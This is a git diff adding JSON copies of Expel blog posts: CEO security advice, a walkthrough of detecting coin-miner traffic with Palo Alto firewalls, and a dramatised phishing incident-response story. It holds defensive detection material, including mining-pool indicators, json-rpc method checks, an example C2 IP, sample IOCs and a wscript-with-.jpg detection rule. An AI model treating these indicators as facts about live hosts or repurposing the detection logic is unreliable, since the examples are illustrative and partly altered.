surfacing enrichment details so the SOC can quickly spot and dispatch non-threat activity. This means that when Josie\u2122 (our detection engine) and Ruxie (our orchestration bot) have decided an alert is worthy of review, the SOC can get to work on a triage knowing they\u2019re not wasting their time." +} \ No newline at end of file diff --git a/dear-fellow-ceo-do-these-seven-things-to-improve-your-org-s.json b/dear-fellow-ceo-do-these-seven-things-to-improve-your-org-s.json new file mode 100644 index 0000000000000000000000000000000000000000..4353fbd57021c8cffc77fdbc8b61a6edda25e7cc --- /dev/null +++ b/dear-fellow-ceo-do-these-seven-things-to-improve-your-org-s.json @@ -0,0 +1,6 @@ +{ + "title": "Dear fellow CEO: do these seven things to improve your org's ...", + "url": "https://expel.com/blog/dear-fellow-ceo-do-these-seven-things-to-improve-orgs-security-posture/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG Dear fellow CEO: do these seven things to improve your org\u2019s security posture Tips \u00b7 6 MIN READ \u00b7 DAVE MERKEL \u00b7 APR 17, 2019 \u00b7 TAGS: Managed security / Management / Overview / Planning You\u2019re at the helm of a fast-growing company. You\u2019re adding staff rapidly, and your team is starting to specialize. Hopefully most of your folks now have one job (or maybe two) instead of the five or six everyone had in the early days. Customers are flying at you left and right (not a bad thing!). Leading a fast-growing org has its perks. And yeah, it\u2019s exciting. 
But as you scale, you\u2019ll inevitably be breaking things as you stress the organization and look to add more capabilities and maturity everywhere you can. Oh, and did I mention that the \u201csnake that kills you today\u201d starts to change shape as you grow, too? It used to be that you were crossing your fingers to make the quarter. Now it\u2019s, \u201cDo we have mature enough finance and business processes to support Sarbanes Oxley?\u201d Another challenge that often pops up if it hasn\u2019t already: Do you have any clue what you\u2019re doing around information security? Maybe you started to care about that yourself. Maybe a well-traveled board member started asking some uncomfortable questions. I get that \u201cinformation security\u201d is probably toward the bottom of your list of \u201cthe snake(s) that\u2019ll kill you today.\u201d But here\u2019s the thing: a reckoning is coming and it usually shows up at a time that\u2019s least convenient. The good news: You can turn the (information security) ship around. Or get two hands back on the wheel if you\u2019ve been spending your time focusing on other things. Here are seven simple things you can do right now that\u2019ll get your org\u2019s security posture on track. 1. Hire an information security business executive, and have her or him report to you Yes, have this person report to you \u2014 the CEO. Don\u2019t be tempted to have him or her report to the CIO, CTO or general counsel. You want a business executive that owns this domain as a close advisor, someone who can translate from security lingo to the language of your business and back again. This person should be a business executive . Someone that understands what your business does, its value proposition and the fact that their role isn\u2019t \u201csay no\u201d \u2014 it\u2019s \u201cfigure out how to say \u2018yes\u2019 while managing risk.\u201d Here\u2019s a litmus test on whether or not you have the right person \u2026 do the CIO and/or CTO respect the CISO\u2019s technical acumen? Would you be comfortable putting this person in front of your board of directors so he or she can educate them on what they should care about and how they should hold the organization accountable for security risk? Do you respect this individual as an executive and can you see yourself proactively seeking his or her counsel? If you answered \u201cno\u201d to any of those questions, keep looking. 2. Identify the org\u2019s top information security risks and write them down As an executive, part of your job is to think about potential risks to the business and devise strategies to address them \u2014 like competitors, markets and external events that may impact your business. Security risks are as important to evaluate as any of the more \u201ctraditional\u201d business concerns that you\u2019ve historically considered. You have capable leaders to deal with risk in all parts of your business. They should all be at the table when you\u2019re talking about security because security impacts every part of your org. If you followed my advice above, you\u2019ll have a CISO \u2014 he or she can (and should) drive this process for you. Additionally, have your general counsel think about the potential legal ramifications of a security incident. And what about your CFO? How will a security-related misstep impact your bottom line? You get the idea. Bring all those brains to the table and work together to think through the various risks and the ripple effects they\u2019ll have on the broader org.
Your execs need to be bought into that response plan, not victims of it. 3. Create your incident response \u201cbrain trust\u201d When something goes sideways (and trust me, it will), who will you call? Sure, the teams with technical expertise will be on the short list, but remember to think about all those potential ripple effects and make sure the right people are at the table when a bad thing happens. This includes legal counsel and even your corporate communications lead. Once again, your CISO will drive this process, but it needs to be sponsored by you so everyone knows it\u2019s important. The best way to prepare for a real security incident is to flex those muscles and practice responding as a group. A great way to do this is to orchestrate a tabletop incident response exercise. Your CISO can get started with your own by downloading our guide to tabletop exercises right here, which has everything you need to simulate a security incident: Oh Noes! A New Approach to IR Tabletop Exercises . When the CISO comes to you to get it scheduled, make sure you support the initiative and give it weight. 4. Build out a true security team Create a security team that\u2019s separate from IT. When security is fully subordinate to IT you run the risk of thinking about security as a technology problem instead of a risk management capability. When security is part of IT, it can incentivize bad behavior. Security could be viewed as purely a cost instead of a necessity to manage risk. As a result, it could face significant budget pressures. Putting security under IT can also make it difficult to champion certain kinds of spends. For example, maybe buying security technology widgets is easy since IT is used to buying tech. But perhaps doing thoughtful risk assessments that span not just technology but business objectives, processes and functions becomes more challenging, if not outright impossible. Radical pro tip: consider having your IT team report to security \u2014 we did it and it works. Remarkably well, in fact. IT decisions almost always involve some aspect of cyber risk. By having your IT function report into security you enable security to be woven into your IT processes and decision making. This helps your organization build security into your systems and infrastructure from the get-go rather than \u201cbolting it on\u201d as an afterthought. 5. Put some quick security controls in place while you build a security program Conducting thorough assessments to understand security risks and technical control gaps is great, but the reality is that attackers aren\u2019t going to take a time out while you get your house in order. That\u2019s why it\u2019s essential that you and your CISO get (or keep) some basic security tools and processes in place quickly, while you simultaneously dive deep into a review of your security processes, programs and tools to figure out what needs fixing. As you work through your assessment, there are plenty of decisions you\u2019ll need to make as you figure out how you want to operate and lay a foundation that minimizes risk. For example, do you want to build your own SOC or use a vendor? What framework will you use to build and measure your new security program? Do you need new technology or are the tools you already have sufficient? 6.
Pick a security framework that you\u2019ll use to assess your org Work with your CISO to pick a framework \u2014 there are plenty to choose from like the NIST Cybersecurity Framework , ISO 27001 , COBIT or something more specialized like HiTRUST \u2014 and stick with it. This will help your exec team communicate your position and plans in a consistent way among one another and with others (like your board, investors and outside counsel) who\u2019ll want those details. By using a framework to organize your planning and assessment activities, you\u2019ll be able to develop a coherent strategic plan, figure out where the gaps are and start to close them quickly. As a bonus, if you\u2019ve socialized the framework with your board, they\u2019ll be able to follow where you are on the journey and ask smarter questions. 7. Track your progress and learn from it Since you hired a CISO first , that person can drive this for you, and he or she will likely use the framework you picked above to backstop their conversations with you and your board about progress. As with so many things, your role is to give this weight. You need to care, ask questions and hold both your CISO and the rest of the organization accountable for delivering on initiatives to improve posture and manage risk. I know what you\u2019re thinking: \u201cThis sounds like any other aspect of my business \u2026 get a leader, listen to their counsel, assess business risks and initiatives in their area, take prompt action and posture for future success.\u201d BINGO. Security is not mystical, as long as you treat it as another function that\u2019s just as important as other key areas of your business, and hire a security leader who is a true peer to the rest of your exec team." +} \ No newline at end of file diff --git a/detecting-coin-miners-with-palo-alto-networks-ngfw.json b/detecting-coin-miners-with-palo-alto-networks-ngfw.json new file mode 100644 index 0000000000000000000000000000000000000000..653a6df6617fa77273912990ff7f27b17cf67210 --- /dev/null +++ b/detecting-coin-miners-with-palo-alto-networks-ngfw.json @@ -0,0 +1,6 @@ +{ + "title": "Detecting Coin Miners with Palo Alto Networks NGFW", + "url": "https://expel.com/blog/detecting-coin-miners-with-palo-alto-networks-ngfw/", + "date": "Jun 30, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Detecting Coin Miners with Palo Alto Networks NGFW Security operations \u00b7 5 MIN READ \u00b7 MYLES SATTERFIELD, BRIAN BAHTIARIAN AND TUCKER MORAN \u00b7 JUN 30, 2022 \u00b7 TAGS: MDR / Tech tools TL;DR 35% of the web application compromise incidents we saw in 2021 resulted in deployment of cryptocurrency coin miners. The Palo Alto Networks next-generation firewall (PAN NGFW) helps detect and investigate coin miner C2. This post walks through a cryptojacking example and provides helpful advice on how to avoid it in your own environment. Cybercriminals are always looking for new ways to make money. These methods don\u2019t always include holding data for ransom (although this tactic is a popular one). In fact, bad actors don\u2019t necessarily have to elevate privileges or move laterally to make their coin. Q: How? A: Cryptojacking . Cryptojacking is when a cybercriminal steals an organization\u2019s computing resources to mine various crypto currency blockchains. As our end-of-year report indicated, 35% of the web application compromise incidents we saw in 2021 resulted in deployment of various cryptocurrency coin miners. 
It\u2019s a sweet gig for the bad guys, too: after the miner is deployed, they can sit back, relax, and watch the money pile up. So how can organizations spot cryptojacking? One of the answers is Palo Alto Networks next-generation firewall (PAN NGFW) series. In addition to affording visibility into network traffic, PAN NGFW embeds different types of command and control (C2) detections. As the use of cryptojacking increases, we\u2019ve noted how PAN NGFW has helped detect and investigate coin miner C2 activity in our customers\u2019 environments. Throughout these investigations, we\u2019ve used PAN NGFW\u2014specifically, firewalls and Cortex XDR \u2014to quickly identify and respond to coin miner infections. To be clear: we don\u2019t believe coin miners are inherently bad\u2014it\u2019s the groups that are exploiting vulnerable web-apps for cryptojacking that are the problem. In this post, we\u2019ll walk through why we\u2019ve found PAN NGFW is great at detecting cryptojacking, and some actions we\u2019ve integrated into Ruxie\u2122, our detection bot, to help. Detecting cryptojacking with PAN NGFW Over the past year, 40% of PAN NGFW \u201cCoinMiner\u201d alerts triaged by our SOC were true positive\u2014an extremely high-performance result. In fact, anytime we ingest a PAN NGFW \u201cCoinMiner\u201d alert into Expel Workbench\u2122 (our analyst platform) we create a high severity alert where we aim to have eyes on the activity within 15 minutes. Our response time for this class of alert? Six minutes. Bottom line: the fidelity of these alerts is quite good. In coin mining incidents detected by our SOC, PAN NGFW \u201cCoinMiner\u201d alerts typically detected network connections to known mining pools (for example, \u201c moneropool[.]com \u201d), use of the JSON-RPC protocol, methods (example: \u201c mining.subscribe \u201d) associated with coin mining, and algorithms used by the miner (example: \u201c nicehash \u201d). Let\u2019s consider an example PAN NGFW coin mining alert in Workbench, the investigative steps we take to determine if the activity is a true positive, and some Ruxie actions we use to boost our investigation. Let\u2019s walk through an example alert This is what a PAN NGFW \u201cCoinMiner\u201d alert would look like in Workbench. Initial Palo Alto next-generation firewall coin-miner alert First, let\u2019s take a look at the source and destination IP addresses and ports. We can see the source IP address starts with 10. \u2014indicating the address is internal to the organization. Additionally, the source and destination ports reveal that the source IP address is likely the client and the destination is the server. (The source port is a part of the ephemeral port range and the destination port is 80, and likely HTTP traffic.) Therefore, if this is coin miner traffic, it\u2019s likely a miner installed on the internal machine reaching out to the mining server. Some quick research on the IP address indicates it\u2019s likely part of a hosting provider. Shodan suggests the IP address has port 80 open, but it\u2019s unclear as to what service is being offered. If we take a look at the application field, we see json-rpc is used. Some research shows crypto miners use json-rpc to communicate with their mining pools. 
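As an aside, the directionality check above (private source address, well-known destination port) is easy to automate. Here\u2019s a quick sketch with Python\u2019s standard ipaddress module; the source port below is made up to stand in for an ephemeral port:

import ipaddress

def classify_flow(src_ip, src_port, dst_ip, dst_port):
    src_internal = ipaddress.ip_address(src_ip).is_private
    dst_internal = ipaddress.ip_address(dst_ip).is_private
    if src_internal and not dst_internal and dst_port < 1024 <= src_port:
        return 'internal client talking to an external server'
    return 'needs a closer look'

# 49732 is a placeholder ephemeral port; the IP addresses match this example alert.
print(classify_flow('10.1.2.3', 49732, '45.9.148.21', 80))

Back to the json-rpc traffic itself.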
Let\u2019s step through the communication flow covered in the reference: Diagram of json-rpc Stratum mining protocol The miner sends a login request to the mining pool for authorization If the authorization is successful, the server sends back a job for the miner to do After the miner completes the job, it sends back a submit to the mining pool server The server sends a response to the miner on whether the submission was successful or not The information from the alert and our research indicates this activity may align with coin mining. Now we can use information from Ruxie to get a better understanding of the traffic going back and forth. We have a Ruxie action that pulls netflow data involving the destination IP address- 45.9.148.21 . In the screenshot below, the data shows consistent communication from the source internal IP address 10.1.2.3 to the destination 45.9.148.21 . Additionally, there\u2019s consistency between the bytes being transferred each time the source IP connects to the destination. Netflow Ruxie action from source to destination IP addresses Finally, we have Ruxie download a packet capture file (PCAP) from the Palo Alto console (if available). Ruxie parses out readable strings as well as info from different layers in the packet. PCAP Ruxie Action What does this mean? The raw data from the packet above indicates active coin-mining activity. The json-rpc data suggests the server is giving the miner a job, specifying details such as the seed_hash and algorithm to use. This activity aligns with step 2 in the overview of mining communication traffic above. We can infer that a miner at or behind the source IP address performed the login process in step 1 because the server wouldn\u2019t have sent the job recorded in the PCAP if it didn\u2019t receive a successful login. At this point, we have enough evidence to conclude there\u2019s a coin miner installed on the host at or behind the IP address 10.1.2.3 . If we have access to endpoint technology, we can use it to determine what process is generating this traffic. We got \u2018em\u2014now what? To improve resilience, we first ask, \u201cHow did the coin miner get here?\u201d If we don\u2019t have access to the source machine of the activity, we may never uncover the answer. However, we can think about some of the common ways coin miners are deployed: Public application exploitation Attackers can exploit public-facing software that\u2019s vulnerable to a remote code execution (RCE) vulnerability to deploy crypto miners. How to prevent: Keep public-facing applications and software up-to-date. As our end-of-year report indicated, we typically see cybercriminals exploit one to three-year-old vulnerabilities. Access key compromise In the past, we\u2019ve watched attackers gain access to long term Amazon Web Services (AWS) access keys\u2014access keys that start with AKIA\u2014and abuse access to deploy EC2 instances and run crypto miners on the deployed instances. How to prevent: Make sure you aren\u2019t exposing access keys in public repositories and implement least privilege for AWS users. Phishing emails/USB devices Coin miners can be deployed via phishing emails or infected USB devices. How to prevent: Disable autorun on Windows 10 machines and educate end users on the impact of phishing emails. 
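For reference, the Stratum-style json-rpc messages in the flow above are small and fairly self-describing. The Python snippet below is illustrative only (method and field names vary between miners and pools), but it shows the kind of content worth flagging:

# An illustrative 'job' message, loosely modeled on the exchange described above.
example_job = {
    'jsonrpc': '2.0',
    'method': 'job',
    'params': {'blob': '...', 'seed_hash': '...', 'algo': 'rx/0'},
}

MINING_HINTS = {'login', 'submit', 'job', 'mining.subscribe', 'mining.authorize'}

def looks_like_mining(message):
    method = str(message.get('method', '')).lower()
    params = message.get('params') or {}
    return method in MINING_HINTS or 'seed_hash' in params or 'algo' in params

print(looks_like_mining(example_job))  # True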
Key takeaways While we understand it\u2019s next to impossible to completely prevent coin miners from being deployed in your environment, here are three key recs for detecting coin mining activity in your org: Look for internal-to-external connections over the json-rpc protocol or to known mining pools (Monerohash, c3pool, and minergate, among others). If you\u2019re using a Palo Alto firewall, investigate their CoinMiner Command and Control Traffic and XMRig Miner Command and Control Traffic alerts. Consider services like Shodan and Censys to see what the internet can see about your attack surface." +} \ No newline at end of file diff --git a/detection-and-response-in-action-an-end-to-end-coverage.json b/detection-and-response-in-action-an-end-to-end-coverage.json new file mode 100644 index 0000000000000000000000000000000000000000..2060c4e2bf7d030fe1a1b4578b97067a9f763e4e --- /dev/null +++ b/detection-and-response-in-action-an-end-to-end-coverage.json @@ -0,0 +1,6 @@ +{ + "title": "Detection and response in action: an end-to-end coverage ...", + "url": "https://expel.com/blog/detection-and-response-in-action-an-end-to-end-coverage-story/", + "date": "Sep 8, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Detection and response in action: an end-to-end coverage story Security operations \u00b7 12 MIN READ \u00b7 NATHAN SORREL \u00b7 SEP 8, 2022 \u00b7 TAGS: MDR What does a comprehensive detection, response and threat hunting strategy look like? Glad you asked. Expel provides three primary service offerings\u2014managed detection and response (MDR), phishing prevention, and threat hunting\u2014and we offer those in a few different flavors to customers around the world. One size doesn\u2019t fit all when it comes to service delivery. Each customer\u2019s distinct environment, risk, and security posture requires that tools work together, so we built Expel to connect all of those services into one coherent, unified experience. The whole really is greater than the sum of its parts. So how do our MDR, phishing, and threat hunting services work, and most importantly, how do they work together ? The following soup-to-nuts description of Expel\u2019s security process borrows details from several real-life detection situations, and the accounts illustrate how our team shut hackers down. While we\u2019ve changed some particulars for the sake of privacy, this story accurately represents how our teams go from triaging alerts all the way to threat hunting and back. We\u2019ll walk you through the entire incident to illustrate how different players on the team and our complementary services reinforce each other. Detection: alert and triage It\u2019s a Sunday at 7:17am EST. The day shift analysts have arrived and are catching up on last night\u2019s activity. Reading through customer communications and recent investigations, the analysts soak up the news. Tools are logged into, browser tabs are organized, and the day begins. Girish checks on a verification request for updates he sent to a customer yesterday. Jenni flips through alerts, looking for \u201cthe weird.\u201d Chris puts the finishing touches on an investigation that looked odd at first, but was quickly explained by some research and a little IP prevalence mapping. Let\u2019s meet our talented crew. Girish, a detection and response analyst, helps keep all the balls in the air. His gift for leadership, organization, and process comes in handy when ensuring 24\u00d77 coverage across three shifts and 25+ analysts. 
In a given week Expel analyzes hundreds of incidents and conducts dozens of investigations. Girish, and others like him, keep the trains running. Chris\u2019 superpower is level-headedness. In security, where a frantic response can lead to disaster, Chris doesn\u2019t react, he responds, by taking a few seconds to reflect on the facts of a case. He radiates calmness, making the whole team make better, smarter decisions. Jenni seems to have threat intel on speed dial. She can research and document activity better than almost anyone. Offering accurate understanding and attribution regarding attack type can be profoundly helpful during an investigation. All of these folks have spent thousands of hours reviewing suspicious activity and investigating the \u201creally bad\u201d stuff from our customers. At 7:48 am EST, an alert arrives \u2014 DNS queries originating from the process Regsvr32.exe. Windows Defender ATP detects a common Windows binary making unusual network connections. This alert arrives in our medium severity queue and is examined by an analyst within 10 minutes. With our automation-forward approach, raw alerts are analyzed immediately by our detection bot, Josie\u2122. It commonly takes less than five minutes for Josie to escalate an alert to a human analyst, and for that analyst to confirm the alert is a threat. We consistently triage our highest fidelity alerts in about two minutes. We track our response time in minutes and we like it that way. Jenni takes a look and quickly notes the processes involved. Its parent is Winword.exe and Jenni begins to comb through its command line arguments. Her experience, combined with open-source tools like Echotrail.io, tell her that the process Regsvr32.exe isn\u2019t commonly generated by the Microsoft Word process. Its network connections heighten her interest, so she digs deeper. Beyond the experience of seeing thousands of alerts a month, our analysts use in-house datasets and open source tools (like Greynoise ) to determine the prevalence and meaning of observed events. Asking questions like, \u201cIs this activity actually uncommon on a global scale?\u201d and \u201cDoes this IP address have a reputation?\u201d leads analysts to better understand what they\u2019re seeing. Her first step is to look for any highlighted text on the Expel Workbench\u2122 alert page, which may indicate this host was involved in a previously disclosed exercise. But the CCTX around the endpoint name shows no indication that this activity is known or expected. \u201cThe host is not known\u2026the user is \u201cmukhi\u201d\u2026wonder who that is? \u2026Where is the\u2026\u201d Jenni\u2019s voice trails off as she thinks aloud through the evidence in front of her. We call it customer context or \u201cCCTX.\u201d It\u2019s most commonly displayed in Workbench as highlighted text. CCTX can be any specific insight provided by the customer related to expected activity from users, endpoints, or network locations, and it helps us quickly assess a situation. Additionally, our analysts flag red team assets, previously compromised hosts, and other artifacts for future reference. Each piece of CCTX information saves our analysts minutes of research, keeping our alert-to-fix times low. After initial triage and lacking further context, Jenni creates an investigation within Workbench and sets about organizing her research. Response: investigation and context This one will require more time and digging. 
Jenni launches a \u201cPermaZoom\u201d 24\u00d77 video call with the rest of the team. \u201cAnyone else see that one in the medium queue? It doesn\u2019t look right.\u201d More analysts jump in to help. DeShawn, always eager to lend a hand, takes a look. \u201cI\u2019m gonna see if any other hosts are talking to that domain,\u201d Tucker chimes in. Chris offers to scope the environment for other instances of the Word document. The Expel security operations center (SOC) is very much a team. Analysts bring their own capabilities and knowledge sets to the table and investigations quickly take shape around the collective strengths of the group. One analyst examines the endpoint within Microsoft Defender for Endpoint while another looks at IP/domain prevalence. A third examines recent phishing activity. It\u2019s not uncommon to have three or more analysts collaborating on the same incident. The collaboration between our analysts also extends to you. The Expel Workbench lets our customers see everything we see in real time \u2014 not after the fact. Workbench gives them potent investigative and data collection tools to power their own daily SOC activities. Jose, an Expel phishing analyst, says he just saw an email submission containing a Word document similar to the \u201ctax help\u201d one identified in the alert. \u201cCan someone grab the Word doc off the host?\u201d he asks. Analysts on the phishing team are pros at triaging suspicious documents. The faster Jose can get that file, the faster he can provide the support Jenni and the team need. Jose gets Chris\u2019 help scoping for evidence of file execution while he compiles a list of users who received the email. While our services offer tremendous value individually, integrating them provides even more coverage against an attack \u2014 a benefit highlighted by this case. The root cause of most attacks? Phishing emails. MDR and phishing services together make up the Expel SOC, and they communicate extensively, maximizing effective response across our customer base. Since Jose and other phishing analysts are at the front edge of so many attacks, they can alert MDR analysts sooner about potential business email compromise (BEC). Attacker trends are commonly noted by phishing analysts, who pass the information on to their MDR counterparts. Overall, having both services in place means fuller coverage and quicker response. Back to the story. Thankfully this customer, Vandelay Industries, provides the Expel SOC with Live Response access via their EDR console, meaning Jose can directly acquire the file for fuller analysis. Detonating the document in our sandbox confirms that the document isn\u2019t, in fact, the \u201cTax Planning Help Guide\u201d its name suggests (we know \u2014 we\u2019re as shocked as you are). \u201cHey, Jenni,\u201d says Jose, \u201cthis sandbox execution looks bad.\u201d Jenni looks at the endpoint timeline (since the malicious document was first opened). \u201cI\u2019m guessing that JPEG isn\u2019t really a JPEG,\u201d she mumbles, as she runs the hash through VirusTotal. Remediation: incident to fix \u201cI\u2019m gonna spin this up into an incident,\u201d Jenni says. \u201cThey need to isolate that host.\u201d For many incidents, automation baked into our process lets Jenni instantly both notify the customer about what we\u2019re seeing and suggest remediation steps. More hosts, hashes, and domains will be added to the list of suggested remediation steps as the SOC gathers indicators of compromise (IOCs). 
\u201cDear Vandelay Industries, Today At 5:47 UTC Windows Defender detected \u2018Regsvr32.exe\u2019 being spawned from `Winword.exe\u2019 on host DESKTOP-3AB921 and making network connections to BadDomain.com\u201d\u2026 Contain the host \u201cDESKTOP-3AB921\u201d Block the malicious Word document \u201cTax Planning Help Guide.docx\u201d with SHA256 hash \u201cba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad\u201d Sinkhole the domain BadDomain.com Block emails from \u201cBadEmails.com\u201d with subject line \u201cDownload the Tax Planning Help Guide\u201d We will update you if we identify any other involved hosts. Within 20 seconds of the incident\u2019s creation, our customer has meaningful action they can use to nip the attack in the bud. And yes, we\u2019re tooting our own horn here. We\u2019re good at what we do and we do it quickly. \u201cWhich customer was that incident for again, Jenni?\u201d asks Deshawn. \u201cI see two more alerts in the medium queue that look similar.\u201d \u201cVandelay Industries.\u201d Jenni replies. \u201cIs that the \u201cDESKTOP-3AB921\u201d host you\u2019re seeing, or a new one?\u201d \u201cSame customer, but new hosts\u2026 both of them. I\u2019ll drop those in the incident and assign those remediations to Vandelay,\u201d DeShawn adds. \u201cThanks,\u201d she says, \u201cI\u2019m gonna make this incident \u2018critical\u2019 and update the customer in Slack. Would you mind scoping those hosts for anything new\u2026domains or otherwise? Whoa. Vandelay already yanked that first host off the network. That was quick!\u201d At this point, much of the heavy lifting is done. Jenni and another member of the Global Response Team (GRT) will continue to deep dive into anything that\u2019s still not fully understood. They\u2019ll ask questions like: How many users received the email and how many clicked on the malicious attachment? What\u2019s the source of the email? How many hosts are involved? What network activity did we see? Was there any evidence of persistence or lateral movement? Did the malicious files successfully execute? Should the hosts be reimaged? New IOCs are added as they are discovered and any new alerts that come through are attached to the Incident. The GRT is composed of senior and principal-level analysts who serve as incident responders for critical incidents. These are our most seasoned analysts and they help validate all aspects of the compromise. Next question: \u201cHow can we help the client avoid this next time?\u201d Resilience: prevention The team shared remediation steps with Vandelay and Jenni awaits confirmation. David has joined the Zoom call as a member of the GRT to help Jenni finalize things. Jenni tells David that, \u201cSo far, we\u2019re seeing execution on three hosts from what appears to be \u2018click-through\u2019 by users into a phishing campaign. That led to a malicious Word file. I\u2019ve updated the customer but am still waiting for them to respond. Two of the hosts are still online. The incident is \u201ccritical\u201d because of the multiple hosts, so they should have received a notification by now, but still no word. I\u2019ll ping their account rep and have them reach out by phone.\u201d David thinks out loud. \u201cSo they don\u2019t have auto-containment in Workbench enabled, Let me get into the console and poke around.\u201d Elapsed time since we first issued customer recommendations: 40 minutes. 
This situation is tricky, as we\u2019re dealing with multiple hosts and decreased weekend staffing by the customer. What can we do when there\u2019s an active threat but the customer is out-of-pocket? Good news: clients can opt into our automated remediation service, which can automatically contain hosts as needed. Unfortunately, Vandelay isn\u2019t taking advantage of this feature. \u201cI think we\u2019ve added all the relevant artifacts to the remediation actions,\u201d David explains. \u201cI\u2019m checking to see if we can suggest anything that\u2019s helpful for the future. Looks like they\u2019ve been recommended previously to turn-off allowing \u2018wscript.exe\u2019 to open shell scripts. I\u2019m seeing that recommendation nine, ten\u202611 times total, over the past year. I\u2019ll add it to the Resilience section again.\u201d This particular customer had a total of 20 endpoint-related security incidents within its environment last year, more than half of which would have been avoided with the proper wscript.exe resilience policy in place. While resilience steps are not always easy to implement, they can make a substantive, positive impact on a customer\u2019s security posture. Expel SOC analysts are up early anyway and available 24/7, but most people don\u2019t want to be awakened on a Sunday morning by a critical incident. Your weekend on-call folks, not to mention your CISO, will thank you for preventing incidents like this. PagerDuty automation, enabling auto-containment and completing resilience recommendations are small investments that can be made to improve response times for future incidents. PagerDuty can wake you up if something goes wrong. Auto-contain authorization lets us isolate compromised hosts even if you don\u2019t wake up. Completed resilience action can help you avoid these issues altogether. Let\u2019s say you want to take a deeper look into your environment. Are my remediation steps working as expected? What else is \u201cRegsvr32.exe\u201d doing on our endpoints? Do we have any coverage gaps? Threat hunting: validation and high-level understanding [The next day; the familiar sound chimes as Bryan joins the Zoom call] \u201cHey gang, is Jenni on? She asked me to pop in\u2026something about a wscript.exe hunt?\u201d Bryan knows both the red and blue side of cyber and now gets to employ those years of experience in a threat hunting capacity. Our hunting service, a big step beyond detection and response, lets us dig deep into customer data to find not only detection gaps and suspicious events, but also to verify resilience. Our hunting catalog easily expands to scope for both confirmation of resilience and absence of emergent IOCs. We ask questions like: Was multi-factor authentication (MFA) really enabled for all users? Is the Server Message Block (SMB) protocol accessible on public facing servers? What Amazon Web Services (AWS) region should we not see in this environment? Does Java.exe ever have any suspicious child processes? These questions are crucial. If you think you\u2019re hardening your infrastructure, don\u2019t you want to be sure? \u201cHey Bryan, I\u2019m here,\u201d Jenni chimes in. \u201cVandelay had a thing yesterday where \u2018wscript.exe\u2019 was involved. I wanted to see if we can do some hunting on how commonly that process is used in their environment. Also, I\u2019d love to be able to verify that shell scripts no longer get opened with wscript? We\u2019ve recommended that resilience action to them a bunch of times. 
It really helps if they\u2019re able to get a better picture across their systems. Is that something we can do?\u201d A lot of in-house security teams are so busy they rarely have time to baseline or research their own environments. Questions like, \u201cWhat parent process typically spawns wscript.exe?\u201d can slip down the priority list. And \u201cWhich users and domains are most commonly seen executing Okta impersonation events?\u201d Or \u201cWhat AWS users do we see commonly using long term AccesskeyIDs?\u201d Expel threat hunting can provide some much needed insight into these and other endpoint, SaaS, and cloud questions. \u201cHey Jenni, glad to jump on. Have they ever confirmed implementation of that resilience step?\u201d Bryan asks. \u201cI wonder if it\u2019s something they\u2019ve simply chosen not to do.\u201d Jenni says, \u201cI saw back in October they marked that action as complete. I\u2019m wondering if they pushed the policy but didn\u2019t quite get the protection they\u2019d intended. We\u2019re still seeing it run, obviously. Do we have a hunt we could employ to scope wscript activity across all their hosts?\u201d \u201cThe Historical Scripting Interpreter hunt would shed some light on that for them,\u201d suggests Bryan. \u201cThey\u2019re using Windows Defender, right? I\u2019ll ping their account rep to see if they want to get the process going. Thanks for bringing this up.\u201d \u201cYeah they are using Defender,\u201d she replies, \u201cand thanks for doing that. Let me know if you need anything from this end.\u201d \u201cThanks Jenni, I\u2019ll keep you posted on how it progresses. Might have you run the analysis when the hunt kicks off. Great catch on the incident, by the way.\u201d The Expel threat hunting service iterates around a historical POV and a broader range of detection complexity. We conduct regular monthly hunts on your tech and infrastructure, and we run periodic IOC hunts as new threats emerge. Even more fun: with Expel, you can take advantage of evolving draft hunts for testing and development. We afford our hunting customers better visibility across their whole landscape. Whether it\u2019s cloud infra, SaaS applications, network, or endpoint-related hunts, our coverage includes a wide array of technologies. For example: AWS\u2019 EC2 modifications hunt Duo\u2019s Suspicious Duo Push activity hunt Cloud apps\u2019 data center logins hunt Cloud infra\u2019s Azure Successful Brute Force hunt We also provide additional insights and resilience recommendations to help reduce risk exposure in the future. Threat hunting allows you to validate that you\u2019re as secure as you\u2019re trying to be, and provides a path forward on things that still need some attention. What else can hunting do? And, where do we go from here? Completing the circle: better detection \u201cWe\u2019re definitely seeing it come through the queue,\u201d says Bryan, \u201cbut I want us to elevate its severity to high. We\u2019ve seen this technique spike this month in particular. The Vandelay incident really highlighted the recent uptick in this usage of a JPEG file as an obfuscated script file. OSINT calls it a Shorse Attack. I don\u2019t know where they get these names\u2026\u201d \u201cSo basically,\u201d Peter replies, \u201cif the command line contains \u2018wscript\u2019 plus \u2018.jpg\u2019 or \u2018.jpeg\u2019 we categorize it as a HIGH. Right?\u201d
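(In pseudocode, the rule Peter is describing boils down to something like the toy Python below; this is an illustration of the logic, not the actual detection content.)

def severity_for(command_line):
    cl = command_line.lower()
    # wscript invoked with an image-extension argument is the tell discussed above
    if 'wscript' in cl and ('.jpg' in cl or '.jpeg' in cl):
        return 'HIGH'
    return 'MEDIUM'

print(severity_for('wscript.exe tax_help.jpeg'))  # HIGH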
Peter, an Expel senior detection and response analyst, joins Bryan to make sure the activity gets categorized appropriately. If the detection logic produces higher-fidelity signal, we want to elevate the severity to get analysts\u2019 attention more quickly. \u201cExactly,\u201d Bryan says. \u201cWe ended up running that query across another five or six customers and found that it\u2019s a lot more prevalent than the months prior. This adjustment should surface these alerts to an analyst even quicker.\u201d Peter nods. \u201cSounds good. That change should be live within the hour. I\u2019ll holler if I have any more questions.\u201d \u201cThanks, Peter. I\u2019ll check back in a few days. This Shorse stuff makes me wonder if this might be a good long-term hunt for our catalog. Basically, wscript.exe being run containing any atypical file types in the command line. I\u2019ll let you know what I find.\u201d Whether it comes out of our threat hunting experience, a phishing campaign, or new threat intel, Expel constantly adjusts the dials on our detection capabilities. We try to harness every ounce of analyst attention and brain power toward customer alerts, and we never want to waste a scrap of what we learn. Completing the feedback loop is critical to properly facing a rapidly evolving threat landscape. Tomorrow, even if attackers start using electric toothbrushes to launch attacks, we\u2019ll be able to respond. What end-to-end coverage means to us We dramatized the Vandelay incident for readability, but we see events like this all the time at Expel. Like, every single week. And each time we work through the alert \u2192 investigation \u2192 phishing \u2192 incident \u2192 hunting \u2192 better detection \u2192 alert cycle (and its various permutations), we get faster and better, to make you safer. Jenni, Girish, Tucker, Jose, Chris, DeShawn, David, Bryan, and Peter are just a few members of the team keeping eyes-on-glass all-day-every-day. This is 360\u00b0 security at 